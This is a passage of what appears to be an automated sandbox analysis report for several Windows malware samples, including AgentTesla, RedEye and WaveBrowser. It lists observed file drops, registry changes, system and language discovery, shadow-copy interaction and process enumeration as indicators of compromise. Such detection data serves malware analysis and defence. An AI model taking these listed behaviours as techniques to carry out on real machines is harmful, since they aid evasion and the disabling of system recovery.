Files\chrome_Unpacker_BeginUnzipping3796_1553930538\ET wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\GW wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\CA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1119211596\manifest.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_634507433\_metadata\verified_contents.json wavebrowser.exe File opened for modification C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll AgentTesla.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\TC wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\BY wavebrowser.exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll AgentTesla.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\PK wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\GB wavebrowser.exe File created C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config AgentTesla.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdaterOnDemand.exe SWUpdaterSetup.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdaterSetup.exe SWUpdaterSetup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\SB wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\PG wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\CY wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\BT wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\AS wavebrowser.exe File opened for modification C:\Program Files (x86)\Butterfly on Desktop\unins000.dat butterflyondesktop.tmp File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1838504521\_metadata\verified_contents.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\SM wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\SK wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\KW wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_564898447\_platform_specific\win_x64\widevinecdm.dll wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\TM wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\RE wavebrowser.exe File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\Word2013BW.dotx WINWORD.EXE File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\SI wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\ZA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\PA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\ML wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\BN wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_925778115\manifest.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\ZW wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\TR wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\MY wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\MD wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\HN wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\GA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\EH wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3796_1553930538\EG wavebrowser.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdaterCore.exe SWUpdaterSetup.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Nope.txt RedEye.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh NetSh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh NetSh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh NetSh.exe -
Program crash 4 IoCs
pid pid_target Process procid_target 3708 712 WerFault.exe 124 5052 4532 WerFault.exe 131 4824 2216 WerFault.exe 134 428 4504 WerFault.exe 139 -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WaveInstaller-v1.5.18.2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdaterSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AgentTesla.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AgentTesla.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YouAreAnIdiot.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5304 SWUpdater.exe 5644 SWUpdater.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer wavebrowser.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS wavebrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName wavebrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 540 vssadmin.exe 3056 vssadmin.exe 6068 vssadmin.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133673923132494951" wavebrowser.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry wavebrowser.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182" LogonUI.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{894ADE70-1E5F-4520-A281-CE3BF0309CE6}\NumMethods\ = "11" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WaveBrwsHTM.RLAZ7WW6LBECXB5FCNTU55MY5Y\Application setup.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\NumMethods SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\NumMethods\ = "8" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775}\ = "IGoogleUpdateCore" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{CEF9DF20-AE5B-4A54-B479-9C2AFC1C2683}\NumMethods\ = "16" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{B2083DCC-1D29-45E6-8386-BEE1488D11AA}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68}\ = "IGoogleUpdate3" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{C5E89508-3927-4EF5-A3B3-C479F0D4E36F} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{97518FC7-7CA2-4921-BC40-F4A07E221C1C}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WavesorSWUpdater.CredentialDialogUser\CLSID\ = "{D12748C8-5013-45E2-9A24-2FB7C2EEFB7C}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{CEF9DF20-AE5B-4A54-B479-9C2AFC1C2683}\NumMethods SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E4E159E0-7B9C-4D75-AC11-A80628173DE3}\NumMethods\ = "8" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{B2083DCC-1D29-45E6-8386-BEE1488D11AA}\NumMethods\ = "24" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\NumMethods\ = "17" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{DA4EFC2D-B243-4BA8-8A14-8937D867B699}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1}\NumMethods\ = "4" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{44367D77-92C0-45E8-840D-0C098E650CE8}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{1BE9D40C-2307-4213-830E-7E3CE9EDF0C2}\ProgID SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{2B2AD342-8BBC-40AD-AF1B-6887EAB9D3D0} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{44367D77-92C0-45E8-840D-0C098E650CE8}\NumMethods SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{62A51DF2-CCB8-4DD9-9069-34B8461617FC} SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{D3C865DD-E36B-432E-9E47-554925B86737} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{D669BD5D-A9B6-47FD-B558-81508AEF48C4}\NumMethods\ = "4" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{2B2AD342-8BBC-40AD-AF1B-6887EAB9D3D0} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WavesorSWUpdater.PolicyStatusUser\CurVer SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E4E159E0-7B9C-4D75-AC11-A80628173DE3}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{DA4EFC2D-B243-4BA8-8A14-8937D867B699}\NumMethods\ = "41" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87}\ = "IPolicyStatusValue" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ = "IAppWeb" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{DDF98EF0-2728-4A8D-8B0F-32627DC56437} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WavesorSWUpdater.Update3WebUser SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF} SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{D3C865DD-E36B-432E-9E47-554925B86737}\ = "IJobObserver2" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{730EBDF4-7AD2-4516-BF1A-6C6F28C60CF9}\NumMethods SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{64A19E70-BCFF-4808-A320-774FD11571E5}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{D669BD5D-A9B6-47FD-B558-81508AEF48C4}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\NumMethods\ = "7" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\ = "IAppVersion" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\NumMethods\ = "8" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WaveBrwsHTM.RLAZ7WW6LBECXB5FCNTU55MY5Y\Application\ApplicationIcon = "C:\\Users\\Admin\\Wavesor Software\\WaveBrowser\\wavebrowser.exe,0" setup.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\.xht setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{64A19E70-BCFF-4808-A320-774FD11571E5}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87} SWUpdater.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{2B2AD342-8BBC-40AD-AF1B-6887EAB9D3D0}\InprocHandler32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{9CD78CBC-FD21-4FFF-B452-9D792A58B7C4}\LocalServer32\ = "\"C:\\Users\\Admin\\Wavesor Software\\WaveBrowser\\1.5.18.2\\notification_helper.exe\"" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\NumMethods\ = "23" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\NumMethods\ = "23" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WaveBrwsHTM.RLAZ7WW6LBECXB5FCNTU55MY5Y\ = "WaveBrowser HTML Document" setup.exe -
NTFS ADS 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 761811.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 267650.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 663595.crdownload:SmartScreen msedge.exe File created C:\windows.exe\:SmartScreen:$DATA RedEye.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 619532.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 194526.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 595948.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 17363.crdownload:SmartScreen msedge.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 7144 WINWORD.EXE 7144 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 2976 msedge.exe 2976 msedge.exe 3280 msedge.exe 3280 msedge.exe 4032 identity_helper.exe 4032 identity_helper.exe 3104 msedge.exe 3104 msedge.exe 1936 msedge.exe 1936 msedge.exe 4572 msedge.exe 4572 msedge.exe 4620 msedge.exe 4620 msedge.exe 4620 msedge.exe 4620 msedge.exe 5088 msedge.exe 5088 msedge.exe 4160 msedge.exe 4160 msedge.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 5828 setup.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 4868 SWUpdater.exe 6520 msedge.exe 6520 msedge.exe 7820 wavebrowser.exe 7820 wavebrowser.exe 6596 msedge.exe 6596 msedge.exe 4820 msedge.exe 4820 msedge.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 7708 SWUpdater.exe 7708 SWUpdater.exe 7808 msedge.exe 7808 msedge.exe 3032 RedEye.exe 3032 RedEye.exe 3032 RedEye.exe 6284 RedEye.exe 6284 RedEye.exe 6284 RedEye.exe 6284 RedEye.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3280 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
